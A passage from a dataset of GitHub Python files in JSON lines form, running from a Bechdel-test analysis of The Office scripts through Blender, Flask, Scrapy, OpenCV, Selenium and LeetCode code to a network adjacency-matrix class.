cachedStopWords]) \n return new_str\n\n\n\n#Define functions to clean up script column\ndef punct(text):\n token=RegexpTokenizer(r'\\w+')#regex\n text = token.tokenize(text)\n text= \" \".join(text)\n return text \n\ndef remove_special_characters(text):\n # define the pattern to keep\n pat = r'[^a-zA-z0-9.,!?/:;\\\"\\'\\s]' \n return re.sub(pat, '', text)\n\n\ndef remove_digits(text):\n pattern = r'[^a-zA-z.,!?/:;\\\"\\'\\s]' \n return re.sub(pattern, '', text)\n\ndef remove_brackets_contents(text):\n pattern = r\"\\[.*?\\]\"\n return re.sub(pattern, \"\", text)\n\n\n\n#Clean up script\n#0.) Convert column to string type\noffice_data['line_text'] = office_data['line_text'].astype('str')\n#1.) Convert to lowercase\noffice_data['cleaned_text'] = office_data['line_text'].str.lower()\n#2.) Remove brackets\noffice_data['cleaned_text'] = office_data['cleaned_text'].apply(func = remove_brackets_contents)\n#3.) Lemmatize words\noffice_data['cleaned_text'] = office_data['cleaned_text'].apply(func = lemmatize)\n#4.) Remove stop words\noffice_data['cleaned_text'] = office_data['cleaned_text'].apply(func = removeStopWords)\n#5.) Remove punctuation\noffice_data['cleaned_text'] = office_data['cleaned_text'].apply(func = punct)\n#6.) Remove special characters\noffice_data['cleaned_text'] = office_data['cleaned_text'].apply(func = remove_special_characters)\n#7.) Remove digits\noffice_data['cleaned_text'] = office_data['cleaned_text'].apply(func = remove_digits)\n#8.) Remove stop words again created from previous functions\noffice_data['cleaned_text'] = office_data['cleaned_text'].apply(func = removeStopWords)\n\n\n\n#Bechdel test\n#Step 1: Indicator for when male is mentioned in conversation\noffice_data['male_subject'] = np.where(# where(condition, [x, y])\n office_data['cleaned_text'].str.contains('he|him|his|michael|jim|kevin|oscar|stanley|toby|roy|ryan|andy|creed|darryl|gabe|david wallace|dwight|todd packer|todd|david'), 1, 0)\n\n#Step 2: Indicator for when a woman is in the scene\noffice_data['women_speaking'] = np.where((office_data['speaker']=='Pam') |\n (office_data['speaker']=='Jan') |\n (office_data['speaker']=='Kelly') |\n (office_data['speaker']==\"Phyllis\") |\n (office_data['speaker']==\"Angela\") |\n (office_data['speaker']==\"Erin\") |\n (office_data['speaker']==\"Holly\") |\n (office_data['speaker']==\"Karen\") |\n (office_data['speaker']==\"Meredith\") \n , 1, 0)\n\n#All women characters\nwomen = office_data[office_data['women_speaking']==1]\nall_women_mains = women['speaker'].sort_values().unique()\n\n#Filter down to the lines spoken by ONLY the main characters\nmain_characters = office_data[office_data['speaker'].str.contains('Andy|Angela|Creed|Darryl|David Wallace|Dwight|Erin|Gabe|Pam|Jan|Jim|Holly|Karen|Kelly|Kevin|Meredith|Michael|Oscar|Pam|Phyllis|Roy|Ryan|Stanley|Toby|Todd Packer')]\n\n#Identify lines spoken per scene and merge metric back into full main character dataset\nlines_per_scene = main_characters.groupby(['season', 'episode','scene']).size().reset_index(name='counts')\nnew_df = pd.merge(main_characters, lines_per_scene, how='left', left_on=['season','episode','scene'], right_on = ['season','episode','scene'])\n\n#Sum down to # of lines spoken by women in scene and merge back into full main character dataset\ntotal_women_lines = new_df.groupby(['season', 'episode','scene'])['women_speaking'].agg('sum').reset_index(name='tot_wom_lines')\nfull_bechdel = pd.merge(new_df, total_women_lines, how='left', left_on=['season','episode','scene'], right_on = ['season','episode','scene'])\n\n#Filter down to the scenes with only women\nfull_bechdel['all_women_scene'] = full_bechdel['counts'] - full_bechdel['tot_wom_lines']\nonly_women = full_bechdel[full_bechdel['all_women_scene']==0]\n\n#Get rid of all testimonial scenes\nonly_women = only_women[only_women['counts']>1]\n\n\n#Calculate the bechdel score\nbechdel_scores = only_women.groupby(['season','speaker'])['male_subject'].agg('sum').reset_index(name='bech_sum')\ntotal_lines = only_women.groupby(['season','speaker']).agg('count').reset_index()\ntotal_lines = total_lines[['season','speaker','counts']]\nbechdel_percs = pd.merge(bechdel_scores, total_lines, how='left', left_on=['season','speaker'], right_on = ['season','speaker'])\n\nbechdel_percs['b_percent'] = round((bechdel_percs['bech_sum']/bechdel_percs['counts'])*100,2)\nbechdel_percs\nbechdel_percs.to_csv('/Users/jonzimmerman/Desktop/Data Projects/The Office NLP/bechdel_season.csv', index=False)\n\n#only_women_df = pd.merge(only_women,bechdel_percs,how='left',on=['speaker'])\n#only_women_df.to_csv('/Users/jonzimmerman/Desktop/Data Projects/The Office NLP/bechdel.csv', index=False)\n\n","repo_name":"statzenthusiast921/The_Office_Project","sub_path":"scripts/bechdel.py","file_name":"bechdel.py","file_ext":"py","file_size_in_byte":5644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4606798436","text":"import bpy\nimport math\n\nclass default_render_settings(bpy.types.Operator):\n '''Set our default render settings.'''\n bl_idname = 'render.default_render_settings'\n bl_label = 'Default Render Settings'\n bl_options = {'REGISTER', 'UNDO'}\n \n\n set_for_all_scenes = bpy.props.BoolProperty(\n name = 'Set for all scenes',\n description = 'Set the following settings for all Scenes in this .blend file.',\n default = False\n )\n\n set_render_engine = bpy.props.EnumProperty(\n name = 'Render Engine',\n description = 'Select rendering engine',\n items = [\n ('CYCLES', 'Cycles',''),\n ('BLENDER_RENDER', 'Blender Render','')\n ]\n )\n\n set_render_device = bpy.props.EnumProperty(\n name = 'Render Device',\n description = 'Select rendering device. GPU can only be used by Cycles.',\n items = [\n ('GPU', 'GPU',''),\n ('CPU', 'CPU','')\n ]\n )\n\n resolution_mode = bpy.props.EnumProperty(\n name = 'Resolution mode',\n description = 'Choose if the render resolution should adapt to the camera Orthographic scale, if the camera should adapt to the render resolution, or set resolution manually.',\n items = [\n ('Smart Resolution', 'Smart Resolution', ''),\n ('Smart Camera' , 'Smart Camera' , ''),\n ('Manual' , 'Manual' , '')\n ]\n )\n\n set_resolution_x = bpy.props.IntProperty(\n name = 'Render Resolution X',\n default = 576\n )\n set_resolution_y = bpy.props.IntProperty(\n name = 'Render Resolution Y',\n default = 576\n )\n set_resolution_percentage = bpy.props.IntProperty(\n name = 'Resolution Percentage',\n default = 100\n )\n\n set_multicomputer = bpy.props.BoolProperty(\n name = 'Render on multiple computers',\n description = 'To render on multiple computers, the output filepath will change to a cache, enabling Placeholder and disabling Overwrite settings.',\n default = False\n )\n\n set_filepath = bpy.props.StringProperty(\n name = 'Render Output File Path',\n description = 'Path for render output, disabled if Multicomputer is used. Compositor File Output nodes are unaffected.',\n default = '//OUTPUT\\\\\\\\x\\\\x_'\n )\n\n set_image_compression = bpy.props.IntProperty(\n name = 'Image Compression',\n default = 100,\n min = 0,\n max = 100\n )\n\n set_frame_start_override = bpy.props.BoolProperty(\n name = 'Override Starting frame',\n description = 'Choose if the Starting frame should be changed',\n default = False\n )\n set_frame_start = bpy.props.IntProperty(\n name = 'Starting frame',\n description = 'Set the first rendered frame.',\n default = 0\n )\n\n set_frame_end_override = bpy.props.BoolProperty(\n name = 'Override Ending frame',\n description = 'Choose if the Ending frame should be changed',\n default = False\n )\n set_frame_end = bpy.props.IntProperty(\n name = 'Ending frame',\n description = 'Set the last rendered frame.',\n default = 0\n )\n \n\n set_use_border = bpy.props.BoolProperty(\n name = 'Use render border',\n description = 'Use the render border set by Ctrl+B.',\n default = False\n )\n set_crop_to_border = bpy.props.BoolProperty(\n name = 'Crop render to border',\n description = 'Crop the render to the border set by Ctrl+B.',\n default = False\n )\n\n set_samples = bpy.props.IntProperty(\n name = 'Samples',\n description = 'Rendering samples.',\n default = 1000\n )\n set_use_animated_seed = bpy.props.BoolProperty(\n name = 'Animated Seed for Samples',\n description = 'Each frame is rendered with different seed for sampling.',\n default = True\n )\n\n set_automatic_render_tile_size = bpy.props.BoolProperty(\n name = 'Automatic render tile size',\n description = 'Automatically set size of render tiles. Maximal for GPU, minimal for CPU.',\n default = True\n )\n set_render_tile_size_x = bpy.props.IntProperty(\n name = 'Manual render tile size X',\n description = 'Manually set X size of render tiles. Only works when Automatic render tile size is OFF.',\n default = 128\n )\n set_render_tile_size_y = bpy.props.IntProperty(\n name = 'Manual render tile size Y',\n description = 'Manually set Y size of render tiles. Only works when Automatic render tile size is OFF.',\n default = 128\n )\n\n set_transparent_max_bounces = bpy.props.IntProperty(\n name = 'Max Transparent Bounces',\n description = 'Limit the amount of light bounces used for transparency.',\n default = 0\n )\n set_caustics_reflective = bpy.props.BoolProperty(\n name = 'Reflective Caustics',\n description = 'Enable or disable reflective caustics.',\n default = False\n )\n set_caustics_refractive = bpy.props.BoolProperty(\n name = 'Refractive Caustics',\n description = 'Enable or disable refractive caustics.',\n default = False\n )\n set_transparent_film = bpy.props.BoolProperty(\n name = 'Transparent Film',\n description = 'Enable or disable Transparent film.',\n default = True\n )\n\n def execute(self,context):\n \n # settings for current scene or all scenes\n if self.set_for_all_scenes == False:\n list_of_scenes = [bpy.context.scene]\n else:\n list_of_scenes = []\n for scene in bpy.data.scenes:\n list_of_scenes.append(scene)\n\n for scn in list_of_scenes:\n # cycles\n scn.render.engine = self.set_render_engine\n\n # GPU rendering\n scn.cycles.device = self.set_render_device\n\n\n # Disable Border\n scn.render.use_crop_to_border = self.set_crop_to_border\n scn.render.use_border = self.set_use_border\n\n # Camera settings\n #obj_camera = bpy.data.objects['CAME-GAME']\n #obj_camera.data.ortho_scale = 36\n\n # File output path for scene\n if self.set_multicomputer == False:\n scn.render.filepath = self.set_filepath\n scn.render.use_overwrite = True\n scn.render.use_placeholder = False\n else:\n scn.render.filepath = '//cache\\\\\\\\' + scn.name + '/' + scn.name + '-cache_'\n scn.render.use_overwrite = False\n scn.render.use_placeholder = True\n\n\n # 1000 samples\n scn.cycles.samples = self.set_samples\n\n # Random seed for sampling\n scn.cycles.use_animated_seed = self.set_use_animated_seed\n\n # Light Paths and Caustics\n scn.cycles.transparent_max_bounces = self.set_transparent_max_bounces\n scn.cycles.caustics_reflective = self.set_caustics_reflective\n scn.cycles.caustics_refractive = self.set_caustics_refractive\n\n # Render Dimensions\n\n # get scene's camera\n \n\n if self.resolution_mode == 'Smart Resolution':\n if bpy.context.scene.camera is None:\n self.report({'ERROR'}, 'Scene has no active camera.')\n else:\n camera_ortho_scale = bpy.data.cameras[bpy.context.scene.camera.data.name].ortho_scale\n scn.render.resolution_x = round(camera_ortho_scale / 4 * 64)\n scn.render.resolution_y = round(camera_ortho_scale / 4 * 64)\n\n elif self.resolution_mode == 'Smart Camera':\n if bpy.context.scene.camera is None:\n self.report({'ERROR'}, 'Scene has no active camera.')\n else:\n bpy.data.cameras[bpy.context.scene.camera.data.name].ortho_scale = scn.render.resolution_x *4 /64\n\n else: # Manual mode\n scn.render.resolution_x = self.set_resolution_x\n scn.render.resolution_y = self.set_resolution_y\n \n # render resolution percentage\n scn.render.resolution_percentage = self.set_resolution_percentage\n\n # Render tile size\n if self.set_automatic_render_tile_size == True:\n if self.set_render_engine == 'CYCLES' and self.set_render_device == 'GPU':\n scn.render.tile_x = scn.render.resolution_x\n scn.render.tile_y = scn.render.resolution_x\n else:\n scn.render.tile_x = 32\n scn.render.tile_y = 32\n else:\n scn.render.tile_x = self.set_render_tile_size_x\n scn.render.tile_y = self.set_render_tile_size_y\n \n # PNG compression\n scn.render.image_settings.compression = self.set_image_compression\n\n # Transparent Film\n scn.cycles.film_transparent = self.set_transparent_film\n\n # start and end frame\n if self.set_frame_start_override == True:\n scn.frame_start = self.set_frame_start\n if self.set_frame_end_override == True:\n scn.frame_end = self.set_frame_end\n\n\n\n \n return {'FINISHED'}","repo_name":"V453000/V-tools","sub_path":"Vtools_default_render_settings.py","file_name":"Vtools_default_render_settings.py","file_ext":"py","file_size_in_byte":8334,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"11329151582","text":"## AUTHOR: GABRIEL DE OLIVEIRA FREIRE SILVA\n\ndef buscaFrom(query):\n try:\n pos_from = query.split(\" \").index(\"from\")\n except:\n print(\"O parâmetro from não foi inserido\")\n return False, 0\n \n return True, pos_from","repo_name":"gabrielofs/py_csv_db","sub_path":"buscas/busca_from.py","file_name":"busca_from.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19214012272","text":"# -*- coding: utf-8 -*-\nimport logging\nfrom datetime import datetime\nfrom typing import Any, Dict, Optional, Union\n\nfrom flask import url_for\nfrom marshmallow import Schema, pre_dump, pre_load, validate\nfrom werkzeug.routing import BuildError\n\nfrom . import fields\nfrom .names import ACTION_ENDPOINT, EXTENSION_LIST_ENDPOINT\nfrom .utilities import description_from_view, view_class_from_endpoint\n\n__all__ = [\"Schema\", \"pre_load\", \"pre_dump\", \"validate\", \"FuzzySchemaType\"]\n\n# Type alias for a Schema, Field, or Dict of Fields or Types\nFuzzySchemaType = Union[Schema, fields.Field, Dict[str, Union[fields.Field, type]]]\n\n\nclass FieldSchema(Schema):\n \"\"\" \"Virtual schema\" for handling individual fields treated as schemas.\n\n For example, when serializing/deserializing individual values that are not\n attributes of an object, like passing a single number as the request/response body\n\n\n \"\"\"\n\n def __init__(self, field: fields.Field):\n \"\"\"Create a converter for data of the field type\n\n Args:\n field (Field): Marshmallow Field type of data\n \"\"\"\n Schema.__init__(self)\n self.field = field\n\n def deserialize(self, value):\n \"\"\"\n\n :param value:\n\n \"\"\"\n return self.field.deserialize(value)\n\n def serialize(self, value):\n \"\"\"Serialize a value to Field type\n\n :param value: Data to serialize\n :returns: Serialized data\n\n \"\"\"\n obj = type(\"obj\", (object,), {\"value\": value})\n\n return self.field.serialize(\"value\", obj)\n\n # We disable pylint unused-argument so we can keep the same signature as the base class\n # pylint: disable=unused-argument\n def dump(self, obj: Any, *, many: Optional[bool] = None):\n \"\"\"\n :param value:\n \"\"\"\n return self.serialize(obj)\n\n\nclass LogRecordSchema(Schema):\n name = fields.String()\n message = fields.String()\n levelname = fields.String()\n levelno = fields.Integer()\n lineno = fields.Integer()\n filename = fields.String()\n created = fields.DateTime()\n\n @pre_dump\n def preprocess(self, data, **_):\n if isinstance(data, logging.LogRecord):\n data.message = data.getMessage()\n if not isinstance(data.created, datetime):\n data.created = datetime.fromtimestamp(data.created)\n return data\n\n\nclass ActionSchema(Schema):\n \"\"\"Represents a running or completed Action\n\n Actions can run in the background, started by one request\n and subsequently polled for updates. This schema represents\n one Action.\"\"\"\n\n action = fields.String()\n _ID = fields.String(data_key=\"id\")\n _status = fields.String(\n data_key=\"status\",\n validate=validate.OneOf(\n [\"pending\", \"running\", \"completed\", \"cancelled\", \"error\"]\n ),\n )\n progress = fields.Integer()\n data = fields.Raw()\n _request_time = fields.DateTime(data_key=\"timeRequested\")\n _end_time = fields.DateTime(data_key=\"timeCompleted\")\n log = fields.List(fields.Nested(LogRecordSchema()))\n\n input = fields.Raw()\n output = fields.Raw()\n\n href = fields.String()\n links = fields.Dict()\n\n @pre_dump\n def generate_links(self, data, **_):\n \"\"\"\n\n :param data:\n :param **kwargs:\n\n \"\"\"\n # Add Mozilla format href\n try:\n url = url_for(ACTION_ENDPOINT, task_id=data.id, _external=True)\n except BuildError:\n url = None\n data.href = url\n\n # Add full link description\n data.links = {\n \"self\": {\n \"href\": url,\n \"mimetype\": \"application/json\",\n **description_from_view(view_class_from_endpoint(ACTION_ENDPOINT)),\n }\n }\n\n return data\n\n\ndef nest_if_needed(schema):\n \"\"\"Convert a schema, dict, or field into a field.\"\"\"\n # If we have a real schema, nest it\n if isinstance(schema, Schema):\n return fields.Nested(schema)\n # If a dictionary schema, build a real schema then nest it\n if isinstance(schema, dict):\n return fields.Nested(Schema.from_dict(schema))\n # If a single field, set it as the output Field, and override its data_key\n if isinstance(schema, fields.Field):\n return schema\n\n raise TypeError(\n f\"Unsupported schema type {schema}. \"\n \"Ensure schema is a Schema object, Field object, \"\n \"or dictionary of Field objects\"\n )\n\n\ndef build_action_schema(\n output_schema: Optional[FuzzySchemaType],\n input_schema: Optional[FuzzySchemaType],\n name: Optional[str] = None,\n base_class: type = ActionSchema,\n):\n \"\"\"Builds a complete schema for a given ActionView.\n\n This method combines input and output schemas for a particular\n Action with the generic ActionSchema to give a specific ActionSchema\n subclass for that Action.\n\n This is used in the Thing Description (where it is serialised to\n JSON in-place) but not in the OpenAPI description (where the input,\n output, and ActionSchema schemas are combined using `allOf`.)\n\n :param output_schema: Schema:\n :param input_schema: Schema:\n :param name: str: (Default value = None)\n\n \"\"\"\n # Create a name for the generated schema\n if not name:\n name = str(id(output_schema))\n if not name.endswith(\"Action\"):\n name = f\"{name}Action\"\n\n class_attrs: Dict[str, Union[fields.Nested, fields.Field, str]] = {}\n\n class_attrs[\n \"__doc__\"\n ] = f\"Description of an action, with specific parameters for `{name}`\"\n if input_schema:\n class_attrs[\"input\"] = nest_if_needed(input_schema)\n if output_schema:\n class_attrs[\"output\"] = nest_if_needed(output_schema)\n\n return type(name, (base_class,), class_attrs)\n\n\nclass EventSchema(Schema):\n event = fields.String()\n timestamp = fields.DateTime()\n data = fields.Raw()\n\n\nclass ExtensionSchema(Schema):\n \"\"\" \"\"\"\n\n name = fields.String(data_key=\"title\")\n _name_python_safe = fields.String(data_key=\"pythonName\")\n _cls = fields.String(data_key=\"pythonObject\")\n meta = fields.Dict()\n description = fields.String()\n\n links = fields.Dict()\n\n @pre_dump\n def generate_links(self, data, **_):\n \"\"\"\n\n :param data:\n :param **kwargs:\n\n \"\"\"\n d = {}\n for view_id, view_data in data.views.items():\n view_cls = view_data.get(\"view\")\n view_urls = view_data.get(\"urls\")\n # Try to build a URL\n try:\n urls = [\n url_for(EXTENSION_LIST_ENDPOINT, _external=True) + url\n for url in view_urls\n ]\n except BuildError:\n urls = []\n # If URL list is empty\n if len(urls) == 0:\n urls = None\n # If only 1 URL is given\n elif len(urls) == 1:\n urls = urls[0]\n # Make links dictionary if it doesn't yet exist\n d[view_id] = {\"href\": urls, **description_from_view(view_cls)}\n\n data.links = d\n\n return data\n","repo_name":"labthings/python-labthings","sub_path":"src/labthings/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":7085,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"53"} +{"seq_id":"38705870693","text":"from selenium import webdriver\n\nclass FindByLinkText():\n def test(self):\n baseUrl = \"https://letskodeit.teachable.com/p/practice\"\n driver = webdriver.Chrome()\n driver.maximize_window()\n driver.get(baseUrl)\n elementByLinkText = driver.find_element_by_link_text(\"Practice\")\n elementByPartialLinkText = driver.find_element_by_partial_link_text(\"Logi\")\n if elementByLinkText is not None:\n print(\"We found an element by Link Text\")\n\n if elementByPartialLinkText is not None:\n print(\"We found an element by Partial Link text\")\n\nff = FindByLinkText()\nff.test()","repo_name":"Lunchesque/udemy","sub_path":"python_projects/SeleniumTutorial/FindingElemenst/FindElementByLiknText.py","file_name":"FindElementByLiknText.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13397672816","text":"'''\n283. Move Zeroes\n\nGiven an integer array nums, move all 0's to the end of it while maintaining the relative order of the non-zero elements.\n\nNote that you must do this in-place without making a copy of the array.\n'''\n\nclass Solution(object):\n def moveZeroes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: None Do not return anything, modify nums in-place instead.\n \"\"\"\n for item in nums:\n if item == 0:\n nums.remove(item)\n nums.append(item)\n \n return nums\n\n\n'''\nsol2) Two Pointers\n\nclass Solution(object):\n def moveZeroes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: None Do not return anything, modify nums in-place instead.\n \"\"\"\n zero = 0 # records the position of \"0\"\n for i in range(len(nums)):\n if nums[i] != 0:\n nums[i], nums[zero] = nums[zero], nums[i]\n zero += 1\n'''","repo_name":"kss02281/Algorithm_Study","sub_path":"2022_Solved/1주차/leetcode_Easy/283.py","file_name":"283.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29008719220","text":"import cv2\r\nimport numpy as np\r\n\r\n\r\nbacksub = cv2.createBackgroundSubtractorMOG2()\r\ncapture = cv2.VideoCapture(\"{video_path}\")\r\nblank_image = np.zeros((600,800), np.uint8)\r\ncv2.rectangle(blank_image, (500, 580), (200, 0), (255,255,255), -1)\r\n\r\nsayac=0\r\n\r\n\r\nif capture:\r\n\r\n while True:\r\n\r\n ret, frame = capture.read()\r\n\r\n if ret:\r\n fgmask = backsub.apply(frame, None, 0.01)\r\n cv2.line(frame, (200,220), (500,220), (255,255,0), 2)\r\n cv2.line(frame, (200,240), (500,240), (255,255,0), 2)\r\n\r\n fgmask = cv2.bitwise_and(fgmask, blank_image)\r\n #kernel = np.ones((5,5), np.uint8)\r\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (2,2))\r\n img_closing = cv2.morphologyEx(fgmask, cv2.MORPH_CLOSE, kernel)\r\n img_opening = cv2.morphologyEx(img_closing, cv2.MORPH_OPEN, kernel)\r\n img_dilation = cv2.dilate(img_opening, kernel, iterations=2)\r\n #th = img_dilation[img_dilation < 240] =0\r\n \r\n \r\n img_erosion = cv2.erode(fgmask, kernel, iterations=1)\r\n \r\n contours, hierarchy = cv2.findContours(img_dilation.copy(), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)\r\n try: hierarchy = hierarchy[0]\r\n except: hierarchy = []\r\n for contour, hier in zip(contours, hierarchy):\r\n (x,y,w,h) = cv2.boundingRect(contour)\r\n \r\n if w > 40 and h > 40:\r\n cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2)\r\n if y > 220 and y < 240:\r\n sayac+=1\r\n print(sayac)\r\n \r\n cv2.putText(frame,\"Araba: \"+str(sayac), (220, 20), cv2.FONT_HERSHEY_SIMPLEX,\r\n 0.6, (0, 0, 0), 2)\r\n\r\n cv2.imshow(\"Takip\", frame)\r\n #cv2.imshow(\"Arka Plan Cikar\", fgmask)\r\n cv2.imshow(\"Final\", img_dilation)\r\n #cv2.imshow(\"erosion\", img_erosion)\r\n #cv2.imshow(\"dilation\", img_dilation)\r\n #cv2.imshow(\"erosion_fgmask\", img_erosion_org)\r\n\r\n\r\n\r\n key = cv2.waitKey(60)\r\n if key == ord('q'):\r\n break\r\n\r\ncapture.release()\r\ncv2.destroyAllWindows()\r\n\r\n","repo_name":"erenyetisgin/smart-traffic-lights","sub_path":"Image Processing/Background_subtraction.py","file_name":"Background_subtraction.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11330523482","text":"import scrapy\n\n\nclass CungusSpider(scrapy.Spider):\n name = \"cungus\"\n allowed_domains = [\"www.cungus.bel.tr\"]\n start_urls = [\"http://www.cungus.bel.tr/kurum/muhtarlar/\"]\n\n def parse(self, response):\n for i, entry in enumerate(response.css(\"table > tbody > tr\")):\n data = entry.css(\"td::text\").getall()\n\n village = data[0].strip()\n mukhtar = data[1].strip()\n tel = data[2].strip()\n\n yield {\n \"Il\": \"Diyarbakir\",\n \"Ilce\": \"Çüngüş\",\n \"Muhtarlik\": village,\n \"Muhtar\": mukhtar,\n \"Tel\": tel,\n \"Kaynak\": self.start_urls[0],\n }\n","repo_name":"furkanakkurt1335/23-2-6_parse","sub_path":"muhtarliklar/muhtarliklar/spiders/cungus.py","file_name":"cungus.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32164204957","text":"import pickle\nimport os\nimport numpy as np\nimport random\n\nrandom.seed(121)\nnp.random.seed(121)\n\n\ndef load_data(file):\n with open(file, 'rb') as fo:\n data = pickle.load(fo, encoding='latin1')\n return data\n\n\ndef save_data(obj, file):\n with open(file, 'wb+') as f:\n pickle.dump(obj, f, )\n\n\ndataset_dir = './data/MiniImagenet/'\nsample_data_dir = './data/sample_data/'\ntrain_dir = os.path.join(dataset_dir, 'miniImageNet_category_split_train_phase_train.pickle')\nval_dir = os.path.join(dataset_dir, 'miniImageNet_category_split_val.pickle')\ntest_dir = os.path.join(dataset_dir, 'miniImageNet_category_split_test.pickle')\nos.makedirs(sample_data_dir, exist_ok=True)\n\ntrain_data = load_data(train_dir)\ndev_data = load_data(val_dir)\ntest_data = load_data(test_dir)\n\ntrain_idx = np.random.permutation(len(train_data['labels']))[:1000]\ndev_idx = np.random.permutation(len(dev_data['labels']))[:400]\ntest_idx = np.random.permutation(len(test_data['labels']))[:400]\n\ntrain_data = {'catname2label': train_data['catname2label'],\n 'labels': [train_data['labels'][x] for x in train_idx],\n 'data': train_data['data'][train_idx]\n }\n\ndev_data = {'catname2label': dev_data['catname2label'],\n 'labels': [dev_data['labels'][x] for x in dev_idx],\n 'data': dev_data['data'][dev_idx],\n 'label2catname': dev_data['label2catname']\n }\n\ntest_data = {'catname2label': test_data['catname2label'],\n 'labels': [test_data['labels'][x] for x in test_idx],\n 'data': test_data['data'][test_idx],\n 'label2catname': test_data['label2catname']\n }\n\n# save_data(train_data, sample_data_dir + 'miniImageNet_category_split_train_phase_train.pickle')\nsave_data(dev_data, sample_data_dir + 'miniImageNet_category_split_val.pickle')\nsave_data(test_data, sample_data_dir + 'miniImageNet_category_split_test.pickle')\n","repo_name":"renmada/ICI-paddle","sub_path":"generate_sample_data.py","file_name":"generate_sample_data.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35899321064","text":"from flask import Flask\nfrom flask_restful import Api\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom controllers.customers_cars import Customer, Car, CustomerList, CarList\nfrom services.customers_cars import CustomerService, CarService\n\n\ndef main():\n # Create the Flask app\n app = Flask(__name__)\n app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///rental.sqlite'\n\n # Create the Flask-RESTful API\n api = Api(app)\n\n # Connect to the database with Flask-SQLAlchemy\n db = SQLAlchemy(app)\n\n customers = CustomerService(db)\n\n # Register the route for each resource\n api.add_resource(CustomerList, '/customers/',\n resource_class_args=[customers])\n\n api.add_resource(Customer, '/customers/',\n resource_class_args=[customers])\n cars = CarService(db)\n\n # Register the route for each resource\n api.add_resource(CarList, '/cars/',\n resource_class_args=[cars])\n\n api.add_resource(Car, '/cars/',\n resource_class_args=[cars])\n app.run(debug=True)\n\n\nif __name__ == '__main__':\n main()","repo_name":"alexandurrr/simple_car_management_test","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9091378177","text":"class Solution:\n def rob(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if len(nums) == 0:\n return 0\n\n if len(nums) < 3:\n return max(nums)\n\n dp = nums\n # dp[i] = max(dp[i - 1], dp[i - 2] + nums[i])\n\n for i, n in enumerate(nums):\n if i == 0:\n continue\n if i == 1:\n dp[i] = max(dp[0], dp[1])\n continue\n dp[i] = max(dp[i-1], dp[i - 2] + n)\n\n print(dp)\n return dp[-1]\n","repo_name":"casprwang/leetcode","sub_path":"solutions/198.house-robber/house-robber.py","file_name":"house-robber.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"20261896350","text":"from cleo.commands.command import Command\n\n\nclass SignatureCommand(Command):\n\n name = \"no:configure\"\n signature = (\n \"signature:command {foo : Foo} {bar? : Bar} {--z|baz : Baz} {--Z|bazz : Bazz}\"\n )\n\n description = \"description\"\n\n help = \"help\"\n\n def handle(self):\n self.line(\"handle called\")\n","repo_name":"vikpe/cleo","sub_path":"tests/fixtures/signature_command.py","file_name":"signature_command.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"14093893238","text":"#!/usr/bin/env python\n\"\"\"\nCoder: max.zhang\nDate: 2015-01-13\nDesc: main structures of network\n\"\"\"\nfrom pprint import pprint\nimport numpy\n\n\nclass Network(object):\n\n def __init__(self, ori_nodenum=10, mul=2):\n self._mat = numpy.zeros((ori_nodenum, ori_nodenum))\n self._node_dict = {}\n self._ori_nodenum = ori_nodenum\n self._mul = mul\n\n @property\n def _cur_size(self):\n return len(self._mat)\n\n @property\n def _node_num(self):\n return len(self._node_dict)\n\n def _expand(self):\n ori_size = self._cur_size\n new_size = ori_size * self._mul\n tmp_mat = numpy.zeros((new_size, new_size))\n for idx in xrange(ori_size):\n tmp_mat[idx][:ori_size] = self._mat[idx][:ori_size]\n self._mat = tmp_mat\n\n def _getNodeIdx(self, node_str):\n node_idx = self._node_dict.setdefault(node_str, self._node_num)\n if self._cur_size < self._node_num:\n self._expand()\n return node_idx\n\n def addEdge(self, node1_str, node2_str, weight=1):\n weight = float(weight)\n node1_idx = self._getNodeIdx(node1_str)\n node2_idx = self._getNodeIdx(node2_str)\n self._mat[node1_idx][node2_idx] = weight\n self._mat[node2_idx][node1_idx] = weight\n\n def show(self):\n print('[NodeIdx]\\t[NodeStr]')\n print('\\n'.join(['%s\\t%s' % item for item in\n [(value, key) for key, value in\n self._node_dict.items()]]))\n print('[NodeIdx]\\t[NodeIdx/Weight]...')\n for idx1 in range(self._node_num):\n nw_list = []\n w_list = self._mat[idx1]\n for idx2 in range(self._node_num):\n weight = self._mat[idx1][idx2]\n if weight < 1e-6:\n continue\n nw_list.append('%s/%s' % (idx2, weight))\n print('%s\\t%s' % (idx1, ','.join(nw_list)))\n\n def clear(self):\n self._mat = numpy.zeros((self._ori_nodenum, self._ori_nodenum))\n self._node_dict 